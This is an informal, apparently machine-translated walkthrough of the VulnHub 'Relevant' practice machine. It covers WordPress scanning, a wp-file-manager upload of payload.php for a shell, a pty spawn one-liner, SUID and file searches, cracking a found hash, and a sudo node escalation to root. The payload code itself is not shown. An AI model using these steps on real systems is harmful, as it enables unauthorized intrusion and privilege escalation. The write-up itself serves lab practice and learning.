Relevant of VulnHub Shooting Range: 1
Scan ip and port:
first look at port 80, and visit the three websites. Visit
one by one, emmm, it looks like you have to go over the wall~~, look over him! ! ! : The
first one is a video, I don’t understand:
The second one, it seems that the username and password should be kept first:
The third one is the QR code: I
scanned something similar to a web site, I don’t know what it is otpauth://totp/patsy@relevant?secret=BTVB3SSDD4SZYUV7DXFPBCIFKY&issuer=relevant
:
OK, there are so many things on the main page,,, scan the directory:
visit wp-admin and see that the database connection fails, it seems to be used I
started wpscan with a WordPress plug-in , and found that it couldn't connect to the external network, so I switched to a bridge connection~ By the way, vritualbox is really not as easy to use as vmware! ! !
But it seems to say that the service is not running, but there is indeed wordpress!
Add a –force parameter and scan again:
Well, there is something, although there is no plug-in or something, but the version is out~~~ I
found a lot of information afterwards, and successfully found a loophole. You need to add a token. It just came out. Not long after the vulnerability, the command is as follows:
Visit the link to download the rec file:
Write the payload.php file, and then run:
path: ip/wp-content/plugins/wp-file-manager/lib/files/payload.php
visit, monitor and get the shell:
shell:
get the interactive shell: python3 -c 'import pty; pty.spawn("/bin/bash")'
next is the privilege escalation part again,,, sudo -l look at the command running permissions, nothing can be done :
Suid view command:, find / -perm -u=s -type f 2>/dev/null
nothing,,,
let's check the users, three users:
check the contents of the user file:, find / -user h4x0r
find a file hidden so trivially:
go in and check: it
looks like a username and password , Check /etc/passwd, it does exist:
Md5 solved it and found that it was sha1:
got the user password of new, and su, and ssh seemed to be unable to connect:
sudo -l to check:
node? What the hell , go to GTFOBins to check:
Execute the command to get root authority:
check the flag:
summary
I have gained a lot. First of all, I know how to use wpscan. You can’t give up just because you didn’t scan out. You have to look at the command manual
and learn more about the usual cve. The wider the knowledge, the more you attack. The stronger, study hard! !